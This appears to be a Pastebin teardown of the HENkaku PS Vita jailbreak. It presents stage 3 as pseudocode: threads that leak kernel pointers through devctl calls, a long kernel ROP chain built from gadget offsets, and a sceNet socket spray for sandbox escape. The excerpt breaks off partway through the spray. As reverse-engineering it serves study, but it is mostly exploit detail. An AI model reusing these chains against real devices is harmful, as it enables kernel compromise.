API tools faq
paste
Advertisement
Guest User

HENkaku exploit teardown - Part 2

a guest
Aug 6th, 2016
7,133
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 44.65 KB | None | 0 0
raw download clone embed print report
  1. - Stage 3 (ROP payload 2):
  2. The second payload is composed by another ROP chain and data.
  3. It creates two userland threads (each one with it's own ROP chain), that take care of leaking kernel pointers (by issuing devctl commands to "sdstor0:") and breaking the userland sandbox (by exploiting sceNet functions).
  4.  
  5. // Copy SD card device path and param
  6. strcpy(x_stack + 0x000086B4, "sdstor0:");
  7. strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");
  8.  
  9. // Clear devctl 0x05 outbuf
  10. // From x_stack + 0x00006F34 to x_stack + 0x00007334
  11. memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);
  12.  
  13. // Copy dummy device path
  14. strcpy(x_stack + 0x000086E4, "molecule0:");
  15.  
  16. // Mount path?
  17. sceLibKernel_A4AD("molecule0:");
  18.  
  19. // Send command 0x05 to "sdstor0:"
  20. sceIoDevctl("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);
  21.  
  22. // Store leaked kernel pointer 1
  23. // Comes from devctl_outbuf + 0x3D4
  24. 0x00(x_stack + 0x00008464) = 0x00(x_stack + 0x00007308) + 0xFFFFA8B9
  25.  
  26. // Create "pln" thread
  27. // "pln" == "pointer leak n"?
  28. // Entry (0x000054C8): LDMIA R1,{R1,R2,R4,R8,R11,SP,PC}
  29. int thread_id = sceKernelCreateThread("pln", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);
  30.  
  31. // Store "pln" thread's ID
  32. 0x00(x_stack + 0x00008E94) = thread_id
  33.  
  34. // Store SceKernelThreadInfo size
  35. 0x00(x_stack + 0x0000862C) = 0x7C
  36.  
  37. // Get thread info structure
  38. sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);
  39.  
  40. // Save pln_threadinfo.stack + 0x00001000
  41. 0x00(x_stack + 0x00008EA0) = 0x00(x_stack + 0x00008660) + 0x00001000
  42.  
  43. // Stack parameters for "pln" ROP chain
  44. 0x00(x_stack + 0x00008954) = 0x00000014
  45. 0x00(x_stack + 0x00008958) = x_stack + 0x00006F34
  46. 0x00(x_stack + 0x0000895C) = 0x000003FF
  47.  
  48. // Stack parameters for "pln" ROP chain
  49. 0x00(x_stack + 0x0000896C) = 0x00000400
  50. 0x00(x_stack + 0x00008970) = 0x00000000
  51. 0x00(x_stack + 0x00008974) = 0x00000000
  52.  
  53. // Setup "pln" ROP chain
  54. 0x00(x_stack + 0x00008708) = 0x008DD9B5
  55. 0x00(x_stack + 0x0000870C) = 0x000086E4
  56. 0x00(x_stack + 0x00008710) = 0x00000000
  57. 0x00(x_stack + 0x00008714) = 0x00000000
  58. 0x00(x_stack + 0x00008718) = 0x00000000
  59. 0x00(x_stack + 0x0000871C) = 0x0000A4AD
  60. 0x00(x_stack + 0x00008720) = 0x00000000
  61. 0x00(x_stack + 0x00008724) = 0x000FCDBB
  62. 0x00(x_stack + 0x00008728) = 0x00000000
  63. 0x00(x_stack + 0x0000872C) = 0x008DD9B5
  64. 0x00(x_stack + 0x00008730) = 0x000086B4
  65. 0x00(x_stack + 0x00008734) = 0x00000005
  66. 0x00(x_stack + 0x00008738) = 0x000086CC
  67. 0x00(x_stack + 0x0000873C) = 0x00008954
  68. 0x00(x_stack + 0x00008740) = 0x0000690C
  69. 0x00(x_stack + 0x00008744) = 0x00000000
  70. 0x00(x_stack + 0x00008748) = 0x000FCDBB
  71. 0x00(x_stack + 0x0000874C) = 0x00000000
  72. 0x00(x_stack + 0x00008750) = 0x008DD9B5
  73. 0x00(x_stack + 0x00008754) = 0x000F4240
  74. 0x00(x_stack + 0x00008758) = 0x00000000
  75. 0x00(x_stack + 0x0000875C) = 0x00000000
  76. 0x00(x_stack + 0x00008760) = 0x00000000
  77. 0x00(x_stack + 0x00008764) = 0x00018544
  78. 0x00(x_stack + 0x00008768) = 0x00000000
  79. 0x00(x_stack + 0x0000876C) = 0x000FCDBB
  80. 0x00(x_stack + 0x00008770) = 0x00000000
  81. 0x00(x_stack + 0x00008774) = 0x008DD9B5
  82. 0x00(x_stack + 0x00008778) = 0x000086B4
  83. 0x00(x_stack + 0x0000877C) = 0x00000005
  84. 0x00(x_stack + 0x00008780) = 0x00007444
  85. 0x00(x_stack + 0x00008784) = 0x0000896C
  86. 0x00(x_stack + 0x00008788) = 0x0000690C
  87. 0x00(x_stack + 0x0000878C) = 0x00000000
  88. 0x00(x_stack + 0x00008790) = 0x000FCDBB
  89. 0x00(x_stack + 0x00008794) = 0x00000000
  90. 0x00(x_stack + 0x00008798) = 0x00000519
  91.  
  92. /*
  93. "pln" ROP
  94.  
  95. // Mount path?
  96. sceLibKernel_A4AD("molecule0:");
  97.  
  98. // Send devctl 0x05
  99. sceIoDevctl_syscall("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);
  100.  
  101. // Delay for a while
  102. sceKernelDelayThread(1000000);
  103.  
  104. // Send devctl 0x05 again using
  105. // input buffer from x_stack + 0x00007444 to x_stack + 0x00007844
  106. sceIoDevctl_syscall("sdstor0:", 0x00000005, x_stack + 0x00007444, 0x00000400, 0x00000000, 0x00000000);
  107.  
  108. // Deadlock
  109. sceWebkit_519();
  110. */
  111.  
  112. // Copy "pln" ROP chain into "pln" thread's stack
  113. memcpy(0x00(x_stack + 0x00008EA0), x_stack + 0x00008708, 0x00000100);
  114.  
  115. // Set stack pointer
  116. 0x00(x_stack + 0x00008830) = x_stack + 0x00008EA0
  117.  
  118. // Set PC
  119. 0x00(x_stack + 0x00008834) = 0x000C048B // POP {PC}
  120.  
  121. // Start "pln" thread
  122. // Thread arguments are loaded into R1 and the gadget
  123. // at the thread's entrypoint then loads register values
  124. // from it, overwritting SP and PC and triggering the
  125. // ROP chain
  126. sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);
  127.  
  128. // Delay for a while
  129. sceKernelDelayThread(100000);
  130.  
  131. // Store leaked kernel pointer 2
  132. // Comes from devctl_outbuf + 0x3C4
  133. 0x00(x_stack + 0x00008458) = 0x00(x_stack + 0x000072F8) + 0xFFFFF544
  134.  
  135. // Setup pointer to leaked address in kernel module 1
  136. 0x00(x_stack + 0x00007444) = 0x00(x_stack + 0x00008464) + 0x0001E460
  137.  
  138. // Setup pointer to leaked address in kernel module 2
  139. 0x00(x_stack + 0x00008EAC) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000300
  140.  
  141. // Setup kernel mode ROP chain
  142. 0x00(x_stack + 0x00008A8C) = 0x00(x_stack + 0x00008464) + 0x00000031
  143. 0x00(x_stack + 0x00008A90) = 0x08106803
  144. 0x00(x_stack + 0x00008A94) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
  145. 0x00(x_stack + 0x00008A98) = 0x00000038
  146. 0x00(x_stack + 0x00008A9C) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
  147. 0x00(x_stack + 0x00008AA0) = 0x00(x_stack + 0x00008464) + 0x00000347
  148. 0x00(x_stack + 0x00008AA4) = 0x00(x_stack + 0x00008464) + 0x000039EB
  149. 0x00(x_stack + 0x00008AA8) = 0x00(x_stack + 0x00008464) + 0x0001B571
  150. 0x00(x_stack + 0x00008AAC) = 0x00000000
  151. 0x00(x_stack + 0x00008AB0) = 0x00(x_stack + 0x00008464) + 0x00001E43
  152. 0x00(x_stack + 0x00008AB4) = 0x00000000
  153. 0x00(x_stack + 0x00008AB8) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
  154. 0x00(x_stack + 0x00008ABC) = 0x00(x_stack + 0x00008464) + 0x0000EA73
  155. 0x00(x_stack + 0x00008AC0) = 0x00(x_stack + 0x00008464) + 0x00000031
  156. 0x00(x_stack + 0x00008AC4) = 0x00(x_stack + 0x00008464) + 0x00027913
  157. 0x00(x_stack + 0x00008AC8) = 0x00(x_stack + 0x00008464) + 0x0000A523
  158. 0x00(x_stack + 0x00008ACC) = 0x00(x_stack + 0x00008464) + 0x00000347
  159. 0x00(x_stack + 0x00008AD0) = 0x00(x_stack + 0x00008464) + 0x00000CE3
  160. 0x00(x_stack + 0x00008AD4) = 0x00(x_stack + 0x00008464) + 0x00000347
  161. 0x00(x_stack + 0x00008AD8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
  162. 0x00(x_stack + 0x00008ADC) = 0x00(x_stack + 0x00008464) + 0x00000067
  163. 0x00(x_stack + 0x00008AE0) = 0x00(x_stack + 0x00008464) + 0x0000587F
  164. 0x00(x_stack + 0x00008AE4) = 0x00(x_stack + 0x00008464) + 0x00019713
  165. 0x00(x_stack + 0x00008AE8) = 0x00(x_stack + 0x00008464) + 0x00001605
  166. 0x00(x_stack + 0x00008AEC) = 0x00(x_stack + 0x00008464) + 0x00001E1D
  167. 0x00(x_stack + 0x00008AF0) = 0x00000000
  168. 0x00(x_stack + 0x00008AF4) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
  169. 0x00(x_stack + 0x00008AF8) = 0x00(x_stack + 0x00008464) + 0x00000347
  170. 0x00(x_stack + 0x00008AFC) = 0x00(x_stack + 0x00008464) + 0x00001603
  171. 0x00(x_stack + 0x00008B00) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
  172. 0x00(x_stack + 0x00008B04) = 0x00(x_stack + 0x00008464) + 0x00001F17
  173. 0x00(x_stack + 0x00008B08) = 0x00(x_stack + 0x00008464) + 0x00000347
  174. 0x00(x_stack + 0x00008B0C) = 0x00(x_stack + 0x00008464) + 0x00000031
  175. 0x00(x_stack + 0x00008B10) = 0x00(x_stack + 0x00008464) + 0x0000B913
  176. 0x00(x_stack + 0x00008B14) = 0x00(x_stack + 0x00008464) + 0x00023B61
  177. 0x00(x_stack + 0x00008B18) = 0x00(x_stack + 0x00008464) + 0x00000347
  178. 0x00(x_stack + 0x00008B1C) = 0x00(x_stack + 0x00008464) + 0x000039EB
  179. 0x00(x_stack + 0x00008B20) = 0x00(x_stack + 0x00008464) + 0x000232EB
  180. 0x00(x_stack + 0x00008B24) = 0x00(x_stack + 0x00008464) + 0x00000347
  181. 0x00(x_stack + 0x00008B28) = 0x00(x_stack + 0x00008464) + 0x0001B571
  182. 0x00(x_stack + 0x00008B2C) = 0x00(x_stack + 0x00008464) + 0x00023B61
  183. 0x00(x_stack + 0x00008B30) = 0x00(x_stack + 0x00008464) + 0x000232F1
  184. 0x00(x_stack + 0x00008B34) = 0x00(x_stack + 0x00008464) + 0x00001411
  185. 0x00(x_stack + 0x00008B38) = 0x00(x_stack + 0x00008464) + 0x00000AE1
  186. 0x00(x_stack + 0x00008B3C) = 0x00(x_stack + 0x00008464) + 0x00000347
  187. 0x00(x_stack + 0x00008B40) = 0x00(x_stack + 0x00008464) + 0x000050E9
  188. 0x00(x_stack + 0x00008B44) = 0x00(x_stack + 0x00008464) + 0x00001411
  189. 0x00(x_stack + 0x00008B48) = 0x00000010
  190. 0x00(x_stack + 0x00008B4C) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
  191. 0x00(x_stack + 0x00008B50) = 0x00(x_stack + 0x00008464) + 0x00012B11
  192. 0x00(x_stack + 0x00008B54) = 0x00(x_stack + 0x00008464) + 0x00000CE3
  193. 0x00(x_stack + 0x00008B58) = 0x00(x_stack + 0x00008464) + 0x000000D1
  194. 0x00(x_stack + 0x00008B5C) = 0x00(x_stack + 0x00008464) + 0x00000347
  195. 0x00(x_stack + 0x00008B60) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
  196. 0x00(x_stack + 0x00008B64) = 0x00(x_stack + 0x00008464) + 0x00000347
  197. 0x00(x_stack + 0x00008B68) = 0x00(x_stack + 0x00008464) + 0x000039EB
  198. 0x00(x_stack + 0x00008B6C) = 0x00(x_stack + 0x00008464) + 0x0001FDC5
  199. 0x00(x_stack + 0x00008B70) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
  200. 0x00(x_stack + 0x00008B74) = 0x00(x_stack + 0x00008464) + 0x00019399
  201. 0x00(x_stack + 0x00008B78) = 0x00(x_stack + 0x00008464) + 0x00019399
  202. 0x00(x_stack + 0x00008B7C) = 0x00(x_stack + 0x00008464) + 0x00011C5F
  203. 0x00(x_stack + 0x00008B80) = 0x00(x_stack + 0x00008464) + 0x00019399
  204. 0x00(x_stack + 0x00008B84) = 0x00(x_stack + 0x00008464) + 0x00000347
  205. 0x00(x_stack + 0x00008B88) = 0x00(x_stack + 0x00008464) + 0x0000B913
  206. 0x00(x_stack + 0x00008B8C) = 0x00000000
  207. 0x00(x_stack + 0x00008B90) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
  208. 0x00(x_stack + 0x00008B94) = 0x00(x_stack + 0x00008464) + 0x00000347
  209. 0x00(x_stack + 0x00008B98) = 0x00(x_stack + 0x00008464) + 0x00001861
  210. 0x00(x_stack + 0x00008B9C) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
  211. 0x00(x_stack + 0x00008BA0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
  212. 0x00(x_stack + 0x00008BA4) = 0x00(x_stack + 0x00008464) + 0x00000347
  213. 0x00(x_stack + 0x00008BA8) = 0x00(x_stack + 0x00008464) + 0x000039EB
  214. 0x00(x_stack + 0x00008BAC) = 0x00(x_stack + 0x00008464) + 0x00019399
  215. 0x00(x_stack + 0x00008BB0) = 0x00(x_stack + 0x00008464) + 0x00000347
  216. 0x00(x_stack + 0x00008BB4) = 0x00(x_stack + 0x00008464) + 0x00019399
  217. 0x00(x_stack + 0x00008BB8) = 0x00(x_stack + 0x00008464) + 0x00000347
  218. 0x00(x_stack + 0x00008BBC) = 0x00(x_stack + 0x00008464) + 0x000039EB
  219. 0x00(x_stack + 0x00008BC0) = 0x00(x_stack + 0x00008464) + 0x0001614D
  220. 0x00(x_stack + 0x00008BC4) = 0x00(x_stack + 0x00008464) + 0x000233D3
  221. 0x00(x_stack + 0x00008BC8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
  222. 0x00(x_stack + 0x00008BCC) = 0x00(x_stack + 0x00008464) + 0x00000347
  223. 0x00(x_stack + 0x00008BD0) = 0x00(x_stack + 0x00008464) + 0x000000AF
  224. 0x00(x_stack + 0x00008BD4) = 0x00(x_stack + 0x00008464) + 0x00001605
  225. 0x00(x_stack + 0x00008BD8) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
  226. 0x00(x_stack + 0x00008BDC) = 0x00(x_stack + 0x00008464) + 0x00000347
  227. 0x00(x_stack + 0x00008BE0) = 0x00(x_stack + 0x00008464) + 0x000050E9
  228. 0x00(x_stack + 0x00008BE4) = 0x00(x_stack + 0x00008464) + 0x000039EB
  229. 0x00(x_stack + 0x00008BE8) = 0x00(x_stack + 0x00008464) + 0x00001347
  230. 0x00(x_stack + 0x00008BEC) = 0x00(x_stack + 0x00008464) + 0x00000347
  231. 0x00(x_stack + 0x00008BF0) = 0x00(x_stack + 0x00008464) + 0x000000B9
  232. 0x00(x_stack + 0x00008BF4) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
  233. 0x00(x_stack + 0x00008BF8) = 0x00(x_stack + 0x00008464) + 0x00001347
  234. 0x00(x_stack + 0x00008BFC) = 0x00(x_stack + 0x00008464) + 0x00000347
  235. 0x00(x_stack + 0x00008C00) = 0x00(x_stack + 0x00008464) + 0x0000039B
  236. 0x00(x_stack + 0x00008C04) = 0x00000000
  237. 0x00(x_stack + 0x00008C08) = 0x00(x_stack + 0x00008464) + 0x0001CB95
  238. 0x00(x_stack + 0x00008C0C) = 0x00(x_stack + 0x00008464) + 0x0001EA93
  239. 0x00(x_stack + 0x00008C10) = 0x00(x_stack + 0x00008464) + 0x00001411
  240. 0x00(x_stack + 0x00008C14) = 0x00(x_stack + 0x00008464) + 0x00000347
  241. 0x00(x_stack + 0x00008C18) = 0x00(x_stack + 0x00008464) + 0x000209D7
  242. 0x00(x_stack + 0x00008C1C) = 0x00(x_stack + 0x00008464) + 0x000209D3
  243. 0x00(x_stack + 0x00008C20) = 0x00(x_stack + 0x00008464) + 0x00001411
  244. 0x00(x_stack + 0x00008C24) = 0x00(x_stack + 0x00008464) + 0x00000347
  245. 0x00(x_stack + 0x00008C28) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
  246. 0x00(x_stack + 0x00008C2C) = 0x00(x_stack + 0x00008464) + 0x00001605
  247. 0x00(x_stack + 0x00008C30) = 0x00(x_stack + 0x00008464) + 0x00000347
  248. 0x00(x_stack + 0x00008C34) = 0x00(x_stack + 0x00008464) + 0x0000652B
  249. 0x00(x_stack + 0x00008C38) = 0x00(x_stack + 0x00008464) + 0x00000347
  250. 0x00(x_stack + 0x00008C3C) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
  251. 0x00(x_stack + 0x00008C40) = 0x00(x_stack + 0x00008464) + 0x00022A49
  252. 0x00(x_stack + 0x00008C44) = 0xFFFFFEB0
  253. 0x00(x_stack + 0x00008C48) = 0x00(x_stack + 0x00008464) + 0x0000039B
  254. 0x00(x_stack + 0x00008C5C) = 0x00000040
  255. 0x00(x_stack + 0x00008C50) = 0x00(x_stack + 0x00008464) + 0x00022A49
  256. 0x00(x_stack + 0x00008C54) = 0x00(x_stack + 0x00008464) + 0x00000347
  257. 0x00(x_stack + 0x00008C58) = 0x00(x_stack + 0x00008464) + 0x0000652B
  258. 0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
  259. 0x00(x_stack + 0x00008C60) = 0x00(x_stack + 0x00008464) + 0x0000039B
  260. 0x00(x_stack + 0x00008C64) = 0x00000040
  261. 0x00(x_stack + 0x00008C68) = 0x00(x_stack + 0x00008464) + 0x00001605
  262. 0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
  263. 0x00(x_stack + 0x00008C70) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
  264. 0x00(x_stack + 0x00008C74) = 0x00(x_stack + 0x00008464) + 0x000039EB
  265. 0x00(x_stack + 0x00008C78) = 0x00(x_stack + 0x00008464) + 0x00000853
  266. 0x00(x_stack + 0x00008C7C) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
  267. 0x00(x_stack + 0x00008C80) = 0x00000038
  268. 0x00(x_stack + 0x00008C84) = 0x00(x_stack + 0x00008464) + 0x000000AB
  269. 0x00(x_stack + 0x00008C88) = 0x00(x_stack + 0x00008464) + 0x000000D1
  270. 0x00(x_stack + 0x00008C8C) = 0x00(x_stack + 0x00008464) + 0x0002328B
  271. 0x00(x_stack + 0x00008C90) = 0x00(x_stack + 0x00008464) + 0x00022FCD
  272. 0x00(x_stack + 0x00008C94) = 0x00(x_stack + 0x00008464) + 0x000000D1
  273. 0x00(x_stack + 0x00008C98) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
  274. 0x00(x_stack + 0x00008C9C) = 0x00(x_stack + 0x00008464) + 0x0002A117
  275. 0x00(x_stack + 0x00008CA0) = 0x00(x_stack + 0x00008464) + 0x00000347
  276. 0x00(x_stack + 0x00008CA4) = 0x00(x_stack + 0x00008464) + 0x00001605
  277. 0x00(x_stack + 0x00008CA8) = 0x00(x_stack + 0x00008464) + 0x00019399
  278. 0x00(x_stack + 0x00008CAC) = 0x00(x_stack + 0x00008464) + 0x00000347
  279. 0x00(x_stack + 0x00008CB0) = 0x00(x_stack + 0x00008464) + 0x000039EB
  280. 0x00(x_stack + 0x00008CB4) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
  281. 0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0
  282. 0x00(x_stack + 0x00008CBC) = 0x00(x_stack + 0x00008464) + 0x0000039B
  283. 0x00(x_stack + 0x00008CC0) = 0x00000040
  284. 0x00(x_stack + 0x00008CC4) = 0x00(x_stack + 0x00008464) + 0x00022A49
  285. 0x00(x_stack + 0x00008CC8) = 0x00(x_stack + 0x00008464) + 0x000039EB
  286. 0x00(x_stack + 0x00008CCC) = 0x00(x_stack + 0x00008464) + 0x00003D73
  287. 0x00(x_stack + 0x00008CD0) = 0x00000000
  288. 0x00(x_stack + 0x00008CD4) = 0x00(x_stack + 0x00008464) + 0x000021FD
  289. 0x00(x_stack + 0x00008CD8) = 0x00(x_stack + 0x00008464) + 0x00000347
  290. 0x00(x_stack + 0x00008CDC) = 0x00(x_stack + 0x00008464) + 0x000050E9
  291. 0x00(x_stack + 0x00008CE0) = 0x00(x_stack + 0x00008464) + 0x00000AE1
  292. 0x00(x_stack + 0x00008CE4) = 0x00(x_stack + 0x00008464) + 0x00000347
  293. 0x00(x_stack + 0x00008CE8) = 0x00(x_stack + 0x00008464) + 0x0002A117
  294. 0x00(x_stack + 0x00008CEC) = 0x00(x_stack + 0x00008464) + 0x00000347
  295. 0x00(x_stack + 0x00008CF0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
  296. 0x00(x_stack + 0x00008CF4) = 0x00(x_stack + 0x00008464) + 0x00000067
  297. 0x00(x_stack + 0x00008CF8) = 0x00(x_stack + 0x00008464) + 0x000039EB
  298. 0x00(x_stack + 0x00008CFC) = 0x00(x_stack + 0x00008464) + 0x0001BF47
  299. 0x00(x_stack + 0x00008D00) = 0x00(x_stack + 0x00008464) + 0x00000347
  300. 0x00(x_stack + 0x00008D04) = 0x00(x_stack + 0x00008464) + 0x000050E9
  301. 0x00(x_stack + 0x00008D08) = 0x00(x_stack + 0x00008464) + 0x0000AF33
  302. 0x00(x_stack + 0x00008D0C) = 0x00(x_stack + 0x00008464) + 0x00000347
  303. 0x00(x_stack + 0x00008D10) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
  304. 0x00(x_stack + 0x00008D14) = 0x00000000
  305. 0x00(x_stack + 0x00008D18) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
  306. 0x00(x_stack + 0x00008D1C) = 0x00(x_stack + 0x00008464) + 0x0000EA73
  307. 0x00(x_stack + 0x00008D20) = 0x00(x_stack + 0x00008464) + 0x0000039B
  308. 0x00(x_stack + 0x00008D24) = 0x00(x_stack + 0x00008464) + 0x00000853
  309. 0x00(x_stack + 0x00008D28) = 0xFFFFFFFF
  310. 0x00(x_stack + 0x00008D2C) = 0x08106803
  311. 0x00(x_stack + 0x00008D30) = 0x00(x_stack + 0x00008464) + 0x000233D3
  312. 0x00(x_stack + 0x00008D34) = 0x00(x_stack + 0x00008464) + 0x00000347
  313. 0x00(x_stack + 0x00008D38) = 0x00(x_stack + 0x00008464) + 0x00000433
  314. 0x00(x_stack + 0x00008D3C) = 0x00(x_stack + 0x00008464) + 0x000233D3
  315. 0x00(x_stack + 0x00008D40) = 0x00(x_stack + 0x00008464) + 0x000150A3
  316. 0x00(x_stack + 0x00008D44) = 0x00000000
  317. 0x00(x_stack + 0x00008D48) = 0x00(x_stack + 0x00008464) + 0x0000A74D
  318. 0x00(x_stack + 0x00008D4C) = 0x00(x_stack + 0x00008464) + 0x00000000
  319. 0x00(x_stack + 0x00008D50) = 0x00(x_stack + 0x00008464) + 0x00000853
  320. 0x00(x_stack + 0x00008D54) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
  321. 0x00(x_stack + 0x00008D58) = 0x00000000
  322. 0x00(x_stack + 0x00008D5C) = 0x00(x_stack + 0x00008464) + 0x00001605
  323. 0x00(x_stack + 0x00008D60) = 0x00(x_stack + 0x00008464) + 0x00000347
  324. 0x00(x_stack + 0x00008D64) = 0x00(x_stack + 0x00008464) + 0x000050E9
  325. 0x00(x_stack + 0x00008D68) = 0x00(x_stack + 0x00008464) + 0x00001605
  326. 0x00(x_stack + 0x00008D6C) = 0x00(x_stack + 0x00008464) + 0x00022FCD
  327. 0x00(x_stack + 0x00008D70) = 0x00(x_stack + 0x00008464) + 0x000039EB
  328. 0x00(x_stack + 0x00008D74) = 0x00(x_stack + 0x00008464) + 0x00000853
  329. 0x00(x_stack + 0x00008D78) = 0x00(x_stack + 0x00008464) + 0x00011C5F
  330.  
  331. // Overwrite specific NULLs in the ROP chain
  332. 0x00(x_stack + 0x00008C04) = 0x00(x_stack + 0x00008EAC)
  333. 0x00(x_stack + 0x00008B48) = 0x00000090
  334. 0x00(x_stack + 0x00008CC0) = 0x00000240
  335. 0x00(x_stack + 0x00008D58) = 0x00000200
  336. 0x00(x_stack + 0x00008D14) = 0x00008FC0
  337.  
  338. // Copy kernel ROP chain
  339. memcpy(x_stack + 0x00007448, x_stack + 0x00008A8C, 0x300);
  340.  
  341. // Copy the first 0x400 bytes of "obfuscated" data
  342. // and append them at the bottom of the ROP chain
  343. memcpy(x_stack + 0x00007744, x_stack + 0x00008EB8, 0x400);
  344.  
  345. // Set kernel thread SP, PC, UNK
  346. 0x00(x_stack + 0x00008858) = 0x00(x_stack + 0x00008458) + 0x000006DC
  347. 0x00(x_stack + 0x0000884C) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000004
  348. 0x00(x_stack + 0x00008850) = 0x00(x_stack + 0x00008464) + 0x00000347
  349.  
  350. // Create "mhm" thread
  351. // "mhm" == "move heap memory"?
  352. // Entry (0x000054C8): LDMIA R1, {R1,R2,R4,R8,R11,SP,PC}
  353. int thread_id = sceKernelCreateThread("mhm", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);
  354.  
  355. // Store "mhm" thread's ID
  356. 0x00(x_stack + 0x00008620) = thread_id
  357.  
  358. // Store SceKernelThreadInfo size
  359. 0x00(x_stack + 0x0000862C) = 0x0000007C
  360.  
  361. // Get "mhm" thread's info structure
  362. sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);
  363.  
  364. // Store mhm_threadinfo.stack + 0x00001000
  365. 0x00(x_stack + 0x000086FC) = 0x00(x_stack + 0x00008660) + 0x00001000
  366.  
  367. // Spam sceNetSocket requests
  368. // sceNetSocket("x", AF_INET, SOCK_STREAM, 0);
  369. 0x00(x_stack + 0x00008470) = sceNetSocket(x_stack + 0x00010388, 0x00000002, 0x00000001, 0x00000000);
  370. 0x00(x_stack + 0x00008474) = sceNetSocket(x_stack + 0x00010390, 0x00000002, 0x00000001, 0x00000000);
  371. 0x00(x_stack + 0x00008478) = sceNetSocket(x_stack + 0x00010398, 0x00000002, 0x00000001, 0x00000000);
  372. 0x00(x_stack + 0x0000847C) = sceNetSocket(x_stack + 0x000103A0, 0x00000002, 0x00000001, 0x00000000);
  373. 0x00(x_stack + 0x00008480) = sceNetSocket(x_stack + 0x000103A8, 0x00000002, 0x00000001, 0x00000000);
  374. 0x00(x_stack + 0x00008484) = sceNetSocket(x_stack + 0x000103B0, 0x00000002, 0x00000001, 0x00000000);
  375. 0x00(x_stack + 0x00008488) = sceNetSocket(x_stack + 0x000103B8, 0x00000002, 0x00000001, 0x00000000);
  376. 0x00(x_stack + 0x0000848C) = sceNetSocket(x_stack + 0x000103C0, 0x00000002, 0x00000001, 0x00000000);
  377. 0x00(x_stack + 0x00008490) = sceNetSocket(x_stack + 0x000103C8, 0x00000002, 0x00000001, 0x00000000);
  378. 0x00(x_stack + 0x00008494) = sceNetSocket(x_stack + 0x000103D0, 0x00000002, 0x00000001, 0x00000000);
  379. 0x00(x_stack + 0x00008498) = sceNetSocket(x_stack + 0x000103D8, 0x00000002, 0x00000001, 0x00000000);
  380. 0x00(x_stack + 0x0000849C) = sceNetSocket(x_stack + 0x000103E0, 0x00000002, 0x00000001, 0x00000000);
  381. 0x00(x_stack + 0x000084A0) = sceNetSocket(x_stack + 0x000103E8, 0x00000002, 0x00000001, 0x00000000);
  382. 0x00(x_stack + 0x000084A4) = sceNetSocket(x_stack + 0x000103F0, 0x00000002, 0x00000001, 0x00000000);
  383. 0x00(x_stack + 0x000084A8) = sceNetSocket(x_stack + 0x000103F8, 0x00000002, 0x00000001, 0x00000000);
  384. 0x00(x_stack + 0x000084AC) = sceNetSocket(x_stack + 0x00010400, 0x00000002, 0x00000001, 0x00000000);
  385. 0x00(x_stack + 0x000084B0) = sceNetSocket(x_stack + 0x00010408, 0x00000002, 0x00000001, 0x00000000);
  386. 0x00(x_stack + 0x000084B4) = sceNetSocket(x_stack + 0x00010410, 0x00000002, 0x00000001, 0x00000000);
  387. 0x00(x_stack + 0x000084B8) = sceNetSocket(x_stack + 0x00010418, 0x00000002, 0x00000001, 0x00000000);
  388. 0x00(x_stack + 0x000084BC) = sceNetSocket(x_stack + 0x00010420, 0x00000002, 0x00000001, 0x00000000);
  389. 0x00(x_stack + 0x000084C0) = sceNetSocket(x_stack + 0x00010428, 0x00000002, 0x00000001, 0x00000000);
  390. 0x00(x_stack + 0x000084C4) = sceNetSocket(x_stack + 0x00010430, 0x00000002, 0x00000001, 0x00000000);
  391. 0x00(x_stack + 0x000084C8) = sceNetSocket(x_stack + 0x00010438, 0x00000002, 0x00000001, 0x00000000);
  392. 0x00(x_stack + 0x000084CC) = sceNetSocket(x_stack + 0x00010440, 0x00000002, 0x00000001, 0x00000000);
  393. 0x00(x_stack + 0x000084D0) = sceNetSocket(x_stack + 0x00010448, 0x00000002, 0x00000001, 0x00000000);
  394. 0x00(x_stack + 0x000084D4) = sceNetSocket(x_stack + 0x00010450, 0x00000002, 0x00000001, 0x00000000);
  395. 0x00(x_stack + 0x000084D8) = sceNetSocket(x_stack + 0x00010458, 0x00000002, 0x00000001, 0x00000000);
  396. 0x00(x_stack + 0x000084DC) = sceNetSocket(x_stack + 0x00010460, 0x00000002, 0x00000001, 0x00000000);
  397. 0x00(x_stack + 0x000084E0) = sceNetSocket(x_stack + 0x00010468, 0x00000002, 0x00000001, 0x00000000);
